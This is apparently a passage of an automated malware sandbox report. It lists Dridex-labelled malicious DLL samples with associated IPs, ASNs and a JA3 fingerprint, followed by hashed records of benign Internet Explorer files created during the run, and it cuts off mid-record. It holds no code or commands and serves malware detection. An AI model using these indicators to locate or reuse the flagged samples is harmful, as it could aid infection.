	SecuriteInfo.com.Trojan.Dridex.735.23113.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.32551.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.1019.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.3229.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.24817.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.27326.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.2669.dll	Get hash	malicious	Browse	92.122.146.68
tls13.taboola.map.fastly.net	pan0ramic0.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.31734.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.12612.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.4639.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.24961.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.6647.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.4309.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.30163.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.17436.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.15942.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.27526.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.71.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.23113.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.32551.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.1019.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.3229.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.24817.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.27326.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.2669.dll	Get hash	malicious	Browse	151.101.1.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FASTLYUS	pan0ramic0.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.31734.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.12612.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.4639.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.24961.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.6647.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.4309.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.30163.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.17436.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.15942.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.27526.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.71.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.23113.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.32551.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.1019.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.3229.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.24817.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.27326.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.2669.dll	Get hash	malicious	Browse	151.101.1.44
SPECTRAIPSpectraIPBVNL	Online_doc20.01.exe	Get hash	malicious	Browse	45.14.226.121
SPECTRAIPSpectraIPBVNL	P4fZLHrU6d.exe	Get hash	malicious	Browse	45.14.226.101

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	pan0ramic0.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	Jan_Order.html	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.31734.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.12612.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.4639.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.24961.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.6647.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.4309.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.30163.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.17436.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.15942.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.27526.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.71.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.23113.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.32551.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.1019.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.3229.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.24817.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Dridex.735.27326.dll	Get hash	malicious	Browse	151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2578
Entropy (8bit):	4.857933768218937
Encrypted:	false
SSDEEP:	48:LKMKMKMYMYMYMYMYMYU+MYM9iM9i+M9iM9iMWMWnMWMWCrIMWCrIMWCrIW2IX7:+ddnnnnnnU+naiai+aiai99n99CrI9Cv
MD5:	F28F7E2A06838AFD6CD51FD33BDC63DC
SHA1:	D837966DAF903689329BB3F8690F534C0C92CE85
SHA-256:	DE252A1E5C8ACB47893D500EDBC2D5B9A8B7B8C79D1F8DFEDD53087986A8A0D9
SHA-512:	06730E0B79ED6C271C3B853CECABE5CD53683502D802B9DDD7C4BFD9BC8E9C9F12CFB40A389B61C8A7842F73C2BF3611EC02E5F05FB9DA14E05471B4432A3BA1
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="430688080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430688080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430688080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430888080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430888080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430888080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430888080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430888080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430888080" htime="30863520" /><item name="mntest" value="mntest" ltime="434408080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="430888080" htime="30863520" /></root><root><item name="HBCM_BIDS" value="{}" ltime="436648080" htime="30863520"

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{53D6E16D-5C93-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	96040
Entropy (8bit):	2.2232981141774406
Encrypted:	false
SSDEEP:	384:rnhMJlU9Arqp/9UHGVjNTol129FTxHWS6/7Erv7i:rJ0g9VQh7
MD5:	F7CFD47B52A998DE91880187990D48AF
SHA1:	95089E0C09DD1F0FB0F69C6B292E40B12D4F3A95
SHA-256:	BC6FFFA3F3780CEABEAB0153E8E8EF1C662AF4DF70166E2F9C6C3BA269D6B051
SHA-512:	CC63B3D286D449406F5027C398DA4B606C7D1D60CDB950EF44D5958BE03058AD56FDD8A159D29CAFD6DA0182F38B63D0F682542AE58E2B8C3FE2959AD097BF6A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{53D6E16F-5C93-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	190110
Entropy (8bit):	3.595961401658249
Encrypted:	false
SSDEEP:	3072:XbZ/2BfcYmu5kLTzGtWZ/2Bfc/mu5kLTzGt5:yXS
MD5:	2BB1F76413807119E01BC5DE9D025C27
SHA1:	7A06F956E337622132A328C266365443F4C9D728
SHA-256:	FEDA85823AE321C61F26F122878AE1284E78184BBD1DBC98705D701C214FFB6E
SHA-512:	62560050A172C37A44902AD7C66EDA38F12E87856890BDD07783918176B2CDB0D23A22338A8672B7680FD8C2AE139311A5CCB9FB753B037CF8D4FF4196233404
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8A523B9B-5C93-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27584
Entropy (8bit):	1.9117254983288319
Encrypted:	false
SSDEEP:	192:ry/ZdQx76bkUFjl2IkW9MgYpjQpG1VjQpGiFYA:ryhix+gUhcMOggoCov
MD5:	FAA6B7C26431DA9EA6385ECB24EB9C00
SHA1:	3172DA1241CD746F2F4DDE9947544C77E3171D3E
SHA-256:	B31A030C41C56CEF0592106316957A966B87E433900D85B29958F10E3412014F
SHA-512:	B86085B8E1EFA3D42FFED57A67BBF7D0565AE3A1D4035937478F26BA5A4FD56B0503AACA24F8815C68EFB594727ED040EC35308A953457308D4E65A34B78426E
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8A523B9D-5C93-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28164
Entropy (8bit):	1.9258107801660982
Encrypted:	false
SSDEEP:	192:r6/ZFQ576DkhFjZ28kWXM2YVE+wzUszknVlHVE+3V0+wzUszkQWA:r6h65+Ihhoo828nwAszKl1nl3wAszRB
MD5:	C0120E668D1575F11A69B77C7C61C5EB
SHA1:	860E054CBD28051DD69CB3A7371478ED2D8C30B3
SHA-256:	C100FE2EFBF981D47A1A2CA0CC2B6CE3871372E247224C4868EFAC25BE48B567
SHA-512:	9568D6A2C5AED6A471DEFDFFA3AEC2FC1CA697D59A1F9D737F69AC7CB4CDDDE55389A5F8BFA49BA88584D923BB88449682D9611D160D9301B55EBEB5853112AB
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{92E377B0-5C93-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.916968977154759
Encrypted:	false
SSDEEP:	192:r0/ZrQp76bkZFjx2wkWEM0YZpwH1PwyqA:r0hEp+gZhg0x0QAFN
MD5:	8C4C87C6921D0847B9D0FA6B8EB3CE94
SHA1:	A9D15A474F51BEA1FBCDA2C17D82003611F58340
SHA-256:	8D368CFC6F8AFFAFB057C05AC0380E20A2BC73A0EEB3C970119B7337BE5ACA22
SHA-512:	DD7843B2583F9830EB304C3F646530A45B1ACBAF06598DB0EB5C1F306653B8FE52960CC8A7DA35C38ECFE6978071E8D314DF907EB7715675C7E8111392479C08
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9A732B57-5C93-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5668155866391176
Encrypted:	false
SSDEEP:	48:IwgZGcprZGwpa4ZG4pQAGrapbSurGQpK8G7HpRwsTGIpG:rg/ZTQ476eBSuFAXTw4A
MD5:	2E07B3DEA72BF0706B8CC7A2728C7F50
SHA1:	168DAC3C33A07DDF157AB6A519F1BB57A115C9CE
SHA-256:	288AD66ADCC6499E6AB80DD6B16EC75BC72B611B845905B50D5BA9E8DEF342DB
SHA-512:	B3D4F49D8917B36085CF4F167C7A7474B27E31E805F3DB83D42DE10B947F2AB2C687543B4B387325AEC04AD9E2BFC1BB7B26D343B884284B2BFD7B6A18CF694A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.078330822996876
Encrypted:	false
SSDEEP:	12:TMHdNMNxOE6+3B+3eGCnWimI002EtM3MHdNMNxOE6+3B+3eGCnWimI00OYGVbkEs:2d6NxOSYASZHKd6NxOSYASZ7YLb
MD5:	E8D23FEC6456747D0ADA19DA2B7758B0
SHA1:	7ACBB78F9BE85139BDABBDEACA8FD7C073B43B7F
SHA-256:	D30884DA866C9DE89FAA9C4AC9F8D3FAE00D11FE89BFD8B72891C1C515069B3D
SHA-512:	E59BD2CF544030A9A54164F0EB7626596AE7425AE91C7FD27B4A61258574D34D664650B5FE0BD034076443C8FC40023BD5A856C919029C77B9130DC7DC7236E3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.104749935581551
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kv6eGCnWimI002EtM3MHdNMNxe2kv6eGCnWimI00OYGkak6EtMb:2d6NxrsSZHKd6NxrsSZ7Yza7b
MD5:	B698566C1A026A7AFECAF4A5CF44C1F1
SHA1:	AB4D1189EBD106ADA57C0ACFA64C77C51DFABCF8
SHA-256:	7FAB3F74E6B91E6630587655C35FC11F26AE4D0E9C63F09FCB852C8178FFD091
SHA-512:	929F2C5F5B64648594B37C3718AEEA8927BFAFDE6A8825E3D8DB654305D6E4F3753B0785EAB131939C19A5F3F1700EBE91FC2D893BF434A7549FF7F9CBC0872A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x2abf79d2,0x01d6f0a0</date><accdate>0x2abf79d2,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x2abf79d2,0x01d6f0a0</date><accdate>0x2abf79d2,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.026573240513829
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLYdkGCnWimI002EtM3MHdNMNxvLYdkGCnWimI00OYGmZEtMb:2d6NxvPSZHKd6NxvPSZ7Yjb
MD5:	71D0C1F000472FEB78A4B5EC32930FF9
SHA1:	59CAB3834FEDE0355A3AEB4D0A16F6754CAE2E0E
SHA-256:	B00D5DF94C819A51EF0AD24CB91A30B4EC2BAE1BB2DFCE4566090884DCB3A581
SHA-512:	D2D75500368D94195CFE00BB268AF4A63DF0C9EE93D659ED48F8298884334E8C1960ACB458744608ED6C7D1589A4F426ED987D7182CBC438E478874095BA82B0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.081325057856631
Encrypted:	false
SSDEEP:	12:TMHdNMNxiLGCnWimI002EtM3MHdNMNxiR+3eGCnWimI00OYGd5EtMb:2d6Nx+SZHKd6Nx/ASZ7YEjb
MD5:	13B62D16D53FE2833C103C40E9F6CFC7
SHA1:	413A66E6E78FEF3E5A73CBAA228CF1E5DC1B24C2
SHA-256:	E63E85A13D2095E7DAC83C84AFEF42D496FC5E8F14F42E1195802FFDF181A0F0
SHA-512:	35D526303DF4305CF66A5EC08914DB97CC8D1DF9E767AB4BBCD23D285CDDB055898D266E68B221EE0DDA3F3B376D97F4176F5FFCEC0509ED6121B81CC617F5A4
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.042142035127609
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwYdkGCnWimI002EtM3MHdNMNxhGwYdkGCnWimI00OYG8K075EtMb:2d6NxQaSZHKd6NxQaSZ7YrKajb
MD5:	4C3C20DCAF88B809A7EFEE9C7C53ACE2
SHA1:	2697C618BAB77D292B34D4C9567C02CAE81E9214
SHA-256:	308D22158348DF543D025151D913D8E0BCD51CC417BD9D5790C270C1056CDF2B
SHA-512:	20442B6B2E3D828F6F3BDC1CAADF5AC3F16CB4C1FA19A4F2AE58FBDE7357F344C49A8A17C92EE940FCE280D2D55439CE88CA0498F59C5E4E6E665918621A81A7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.082021388198423
Encrypted:	false
SSDEEP:	12:TMHdNMNx0n6+3B+3eGCnWimI002EtM3MHdNMNx0n6+3B+3eGCnWimI00OYGxEtMb:2d6Nx0JYASZHKd6Nx0JYASZ7Ygb
MD5:	D598FF82CD4905CD377B2D2E37503A43
SHA1:	4F8327495D8A8D739B66E3D26B467048BCC2BAA9
SHA-256:	FDA72EA472E892518A40D9C5FB96D42844B07D26BC5361565474EB7B559B1AA9
SHA-512:	DE7C4B151FF97BFF5714E4EC5375BBAE5D754A153AF5075ECD191FD5705B288B031EE29541F7B06E39C722F44ED1A2CD5504C16FC5707DB90FCC7A25100D211D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.11796610232467
Encrypted:	false
SSDEEP:	12:TMHdNMNxx6+3B+3eGCnWimI002EtM3MHdNMNxx6+3B+3eGCnWimI00OYG6Kq5Ety:2d6NxvYASZHKd6NxvYASZ7Yhb
MD5:	E0CBA3A6A5A63B31B2C16855119A0E69
SHA1:	50977FBF758E2B8FF8A7EEB74A95E9993B71793C
SHA-256:	9CE906064150EB8FACE057DEAA1FF42680FCA53952E643FB610E3422B24EE9AC
SHA-512:	53655D2BD4DAB50DCA3E515223C9B7051593F9474836F6B8C706CCC85377534956F8528A736F9A5C5A137CA5DC56CEA58D25E74106B12657F5F763F4209B3FBD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.07181344063471
Encrypted:	false
SSDEEP:	12:TMHdNMNxcLGCnWimI002EtM3MHdNMNxcLGCnWimI00OYGVEtMb:2d6NxgSZHKd6NxgSZ7Ykb
MD5:	FDBACC4E00166C55FA650EEA9AA9EA38
SHA1:	B9B6683EB9ECCDD60AC0D07D4AFFEFEDD0F4AA37
SHA-256:	5737C4A4197799C3B949907ECABFA3E301DF176564E0C217C1BE2FA2349AF63A
SHA-512:	A6831EF1104C4B0D3B491E4051F35EAA256891754949CA5526E1DC496A38300AA9FC89C3A33BD6AA2E99F449D52E7D3770FEF1925670FFAB0F9B3233104421F0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.055582702863978
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnLGCnWimI002EtM3MHdNMNxfnLGCnWimI00OYGe5EtMb:2d6NxpSZHKd6NxpSZ7YLjb
MD5:	50CC4AEF22C2A56860A71221578BEB63
SHA1:	4D9AA5A64BA9F9927809CA598DFCD0F527F74970
SHA-256:	95302BD3D296903E143DC26F6AACBCB8322B28E7C02B3AE30226CE6B7315360C
